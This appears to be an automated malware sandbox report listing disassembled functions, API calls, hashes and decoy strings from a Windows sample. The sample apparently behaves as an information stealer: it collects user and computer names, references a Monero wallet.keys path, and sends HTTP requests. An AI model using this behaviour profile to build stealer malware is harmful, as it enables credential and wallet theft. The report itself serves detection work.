                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressProc$LibraryLoad
                                          • String ID: NtQueryInformationProcess
                                          • API String ID: 2238633743-2781105232
                                          • Opcode ID: d73de6d7427737ce7b7c3850f28992e29b21ed3533f34851d86192d54a082cde
                                          • Instruction ID: 56d6622baca334352a30db5b0fc1441622380c21f7bd2af582409f711c893b33
                                          • Opcode Fuzzy Hash: d73de6d7427737ce7b7c3850f28992e29b21ed3533f34851d86192d54a082cde
                                          • Instruction Fuzzy Hash: 04A15BB5702241DFD364EFA8E989A6637F9F78C301705851ABE868324CD73FA941CB24
                                          Function 00E945C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 677 e945c0-e94695 RtlAllocateHeap 694 e946a0-e946a6 677->694 695 e946ac-e9474a 694->695 696 e9474f-e947a9 VirtualProtect 694->696 695->694
                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00E9460F
                                          • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00E9479C
                                          Strings
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E94617
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E94643
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E94770
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E94657
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E9474F
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E94622
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E94638
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E94729
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E946C2
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E946AC
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E9473F
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E9471E
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E9475A
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E946CD
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E94765
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E94683
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E945F3
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E945C7
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E94713
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E945DD
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E945D2
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E9466D
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E94662
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E945E8
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E946D8
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E94734
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E946B7
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E9477B
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E9462D
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E94678
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeapProtectVirtual
                                          • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                          • API String ID: 1542196881-2218711628
                                          • Opcode ID: e0f13bbcf8a49429e53e79ac26b7baa9e1225278ae5f36e6f7f97551795331c5
                                          • Instruction ID: af9810ff444dc09898e720d99ec5552cddf0712fdab8b0aebd37d8dde01e4d91
                                          • Opcode Fuzzy Hash: e0f13bbcf8a49429e53e79ac26b7baa9e1225278ae5f36e6f7f97551795331c5
                                          • Instruction Fuzzy Hash: 3841C2617CB70C6BC7A5B7A49C6FFDE76966F4AF10B907750EC0062282CBE06600C616
                                          Function 00E94880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 801 e94880-e94942 call eaa7a0 call e947b0 call eaa740 * 5 InternetOpenA StrCmpCA 816 e9494b-e9494f 801->816 817 e94944 801->817 818 e94ecb-e94ef3 InternetCloseHandle call eaaad0 call e99ac0 816->818 819 e94955-e94acd call ea8b60 call eaa920 call eaa8a0 call eaa800 * 2 call eaa9b0 call eaa8a0 call eaa800 call eaa9b0 call eaa8a0 call eaa800 call eaa920 call eaa8a0 call eaa800 call eaa9b0 call eaa8a0 call eaa800 call eaa9b0 call eaa8a0 call eaa800 call eaa9b0 call eaa920 call eaa8a0 call eaa800 * 2 InternetConnectA 816->819 817->816 829 e94f32-e94fa2 call ea8990 * 2 call eaa7a0 call eaa800 * 8 818->829 830 e94ef5-e94f2d call eaa820 call eaa9b0 call eaa8a0 call eaa800 818->830 819->818 905 e94ad3-e94ad7 819->905 830->829 906 e94ad9-e94ae3 905->906 907 e94ae5 905->907 908 e94aef-e94b22 HttpOpenRequestA 906->908 907->908 909 e94b28-e94e28 call eaa9b0 call eaa8a0 call eaa800 call eaa920 call eaa8a0 call eaa800 call eaa9b0 call eaa8a0 call eaa800 call eaa9b0 call eaa8a0 call eaa800 call eaa9b0 call eaa8a0 call eaa800 call eaa9b0 call eaa8a0 call eaa800 call eaa920 call eaa8a0 call eaa800 call eaa9b0 call eaa8a0 call eaa800 call eaa9b0 call eaa8a0 call eaa800 call eaa920 call eaa8a0 call eaa800 call eaa9b0 call eaa8a0 call eaa800 call eaa9b0 call eaa8a0 call eaa800 call eaa9b0 call eaa8a0 call eaa800 call eaa9b0 call eaa8a0 call eaa800 call eaa920 call eaa8a0 call eaa800 call eaa740 call eaa920 * 2 call eaa8a0 call eaa800 * 2 call eaaad0 lstrlen call eaaad0 * 2 lstrlen call eaaad0 HttpSendRequestA 908->909 910 e94ebe-e94ec5 InternetCloseHandle 908->910 1021 e94e32-e94e5c InternetReadFile 909->1021 910->818 1022 e94e5e-e94e65 1021->1022 1023 e94e67-e94eb9 InternetCloseHandle call eaa800 1021->1023 1022->1023 1024 e94e69-e94ea7 call eaa9b0 call eaa8a0 call eaa800 1022->1024 1023->910 1024->1021
                                          APIs
                                            • Part of subcall function 00EAA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EAA7E6
                                            • Part of subcall function 00E947B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E94839
                                            • Part of subcall function 00E947B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00E94849
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00E94915
                                          • StrCmpCA.SHLWAPI(?,00BBFCF0), ref: 00E9493A
                                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E94ABA
                                          • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00EB0DDB,00000000,?,?,00000000,?,",00000000,?,00BBFD20), ref: 00E94DE8
                                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00E94E04
                                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00E94E18
                                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00E94E49
                                          • InternetCloseHandle.WININET(00000000), ref: 00E94EAD
                                          • InternetCloseHandle.WININET(00000000), ref: 00E94EC5
                                          • HttpOpenRequestA.WININET(00000000,00BBFBD0,?,00BBF278,00000000,00000000,00400100,00000000), ref: 00E94B15
                                            • Part of subcall function 00EAA9B0: lstrlen.KERNEL32(?,00BB8938,?,\Monero\wallet.keys,00EB0E17), ref: 00EAA9C5
                                            • Part of subcall function 00EAA9B0: lstrcpy.KERNEL32(00000000), ref: 00EAAA04
                                            • Part of subcall function 00EAA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EAAA12
                                            • Part of subcall function 00EAA8A0: lstrcpy.KERNEL32(?,00EB0E17), ref: 00EAA905
                                            • Part of subcall function 00EAA920: lstrcpy.KERNEL32(00000000,?), ref: 00EAA972
                                            • Part of subcall function 00EAA920: lstrcat.KERNEL32(00000000), ref: 00EAA982
                                          • InternetCloseHandle.WININET(00000000), ref: 00E94ECF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                          • String ID: "$"$------$------$------
                                          • API String ID: 460715078-2180234286
                                          • Opcode ID: 14b00a2e7168f76b6e301833c8c708217a22fead810a2511bba663c2c956965f
                                          • Instruction ID: d1ea88699242d28450b27f003e40f25d003ad140aad3f4e8521773e4acc1e40b
                                          • Opcode Fuzzy Hash: 14b00a2e7168f76b6e301833c8c708217a22fead810a2511bba663c2c956965f
                                          • Instruction Fuzzy Hash: 89124E72910218AADB58EB90DC96FEEB3B8BF59300F5451A9B10676091EF343F49CF61
                                          Function 00EA78E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EA7910
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00EA7917
                                          • GetComputerNameA.KERNEL32(?,00000104), ref: 00EA792F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateComputerNameProcess
                                          • String ID:
                                          • API String ID: 1664310425-0
                                          • Opcode ID: d65c674f79adec8a3eb0ad96438dc7edf27b6f80b7edac237a56a7b9364829cf
                                          • Instruction ID: f0773870aa1541f0f452216edb748a72dd0e89211326913ad982376b9aaceb80
                                          • Opcode Fuzzy Hash: d65c674f79adec8a3eb0ad96438dc7edf27b6f80b7edac237a56a7b9364829cf
                                          • Instruction Fuzzy Hash: DA0186B1A08204EFC710DF94DD46BABFBB8F749B21F10425AF985F7280C37569008BA1
                                          Function 00EA7850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00E911B7), ref: 00EA7880
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00EA7887
                                          • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00EA789F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateNameProcessUser
                                          • String ID:
                                          • API String ID: 1296208442-0
                                          • Opcode ID: 9f5bd94169db22e2e04ea040602c6846214203d8b6130fb209e8048ae870fddd
                                          • Instruction ID: 86a29a09595ac7911e40f551562e0298b514af44f89bc7e7db6a0a8a780e9332
                                          • Opcode Fuzzy Hash: 9f5bd94169db22e2e04ea040602c6846214203d8b6130fb209e8048ae870fddd
                                          • Instruction Fuzzy Hash: 2EF044B1E44208EBC714DF94DD46BAEBBB8F709711F100159FA45A3680C77915048BA1
                                          Function 00E91160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExitInfoProcessSystem
                                          • String ID:
                                          • API String ID: 752954902-0
                                          • Opcode ID: 25aeda6ed038e8dbca35aa517c9bef7823cac9e96a5ccc534d45f2976a1218d6
                                          • Instruction ID: 221206a858cbde7506360e9a1e6edd4f68e64714b72dcd616f6ea9289d621d05
                                          • Opcode Fuzzy Hash: 25aeda6ed038e8dbca35aa517c9bef7823cac9e96a5ccc534d45f2976a1218d6
                                          • Instruction Fuzzy Hash: 27D05E74A0130CDBCB10DFE0D8496DDBB78FB08312F001594DD0673340EA315481CBA5
                                          Function 00EA9C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
